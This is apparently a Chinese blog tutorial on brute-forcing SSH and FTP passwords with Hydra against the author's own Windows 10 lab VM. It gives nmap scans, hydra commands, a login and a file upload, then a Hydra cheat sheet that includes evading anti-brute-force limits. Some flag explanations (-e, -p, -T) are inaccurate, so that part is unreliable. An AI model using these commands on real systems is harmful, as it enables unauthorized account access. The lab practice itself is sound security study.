Hydra九头蛇爆破

Hydra九头蛇爆破

前期准备:

系统环境:KALI2024和Win10,在Vmware下使用

  • SSH(远程登录)爆破

1.开启SSH服务器

Win10上开启ssh

①点击开机键→设置

②单击应用

③点击管理可选功能

④检查是否存在OpenSSH服务器和OpenSSH客户端,不存在的话,点击添加功能,找到这俩,然后等待安装(大概需要5分钟),注:两个都需要安装,缺一不可

⑤cmd中输入net start sshd ,开启ssh服务

2. KALI上爆破

1)使用nmap查看靶机开启的端口

①在实验前需要先确保可以ping通靶机Win10

②使用nmap -sS 192.168.200.134 检查靶机开放的端口

2)用户和密码字典

①使用crunch自动生成字典

②手写用户字典

3)开始爆破Win10的SSH

使用命令:hydra -t 40  -L users.txt -P pass.txt ssh://192.168.200.134 -f

4)实现远程登录Win10

使用命令:ssh administrator@192.168.200.134

此时就在KALI上登录成功了

退出的话使用命令 exit

  • FTP爆破

1.Win10上开启FTP服务

1)安装FTP服务

点击控制面板→程序→启用或关闭Windows 功能 (然后按图中勾选的勾选)

2)设置IIS的FTP服雾1

①搜索IIS并且以管理员身份运行

②然后点开网站的下拉菜单→右键添加FTP站点

③输入站点名称和物理路径

④此时选择靶机的IP地址和端口号,以及勾选无SSL

⑤根据需要选择身份验证,建议选择基本,因为选择了匿名的话FTP登录时就不需要用密码就可以直接登录了

⑥设置FTP防火墙允许应用

按照:控制面板→系统和安全→Windows Defender 防火墙→允许的应用

路径一定要选择:C:\Windows\System32\svchost.exe

2.KALI上实现登录FTP上传下载Win10

1)扫描查看Win10的ftp端口是否开启

2)爆破Win10的ftp

使用命令: hydra -t 40  -l administrator -P pass.txt ftp://192.168.200.134 -f

  1. 实现FTP登录

①使用命令:ftp administrator@192.168.200.134

②put上传命令:put /root/pass.txt /password.txt

exit 退出ftp服务

3.检查是否上传成功

登录Win10,在文件目录行输入  ftp:192.168.200.134//

此时就可以看到我们刚刚从KALI上上传的文件里

总结:

Hydra是一款非常好用且适合小白上手的密码爆破工具,建议大家可以多练练,以下是常见的命令:

1.基本使用

hydra -l username -P password_file -t 4 target

这里 -l 指定了用户名(如果是字典攻击,则使用 -L),-P 指定了密码文件,-t 指定了并发线程数,target 是目标服务器的地址。

2.指定端口:

hydra -p password -e ns -s port target

-p 指定了密码,-e 指定了加密类型(ns 代表无密码或SSH的空密码),-s 指定了端口号。

3.使用用户名字典文件:

hydra -L user_file -p password -t 4 target

-L 指定了用户名字典文件,每个用户名占一行。

4.使用密码字典文件:

hydra -l username -P pass_file -t 4 target

-P 指定了密码字典文件。

5.指定服务类型:

hydra -l username -p password -S target -t 4 snmp

-S 表示使用SSL,snmp 指定了服务类型。

6.FTP 破解:

hydra -l username -p password ftp://target

7.SSH 破解:

hydra -l username -P pass_file ssh://target

8.HTTP 表单破解:
hydra -l username -P pass_file http://target/index.php

9.使用代理

hydra -l username -p password -p 8080 target

-p 后面直接跟代理端口号。

10.慢速攻击(避免触发防暴力破解机制):

hydra -l username -p password -T 1 target

-T 后面跟的是时间间隔(秒)。

11.显示详细过程:

hydra -l username -p password -v target

-v 表示显示详细模式。

12.使用特定嗅探模块:

hydra -M snmp://target -m 1 -o found.txt

-M 指定了模块文件,-m 指定了模块中的哪个嗅探模式使用,-o 指定了输出文件。

  • 27
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值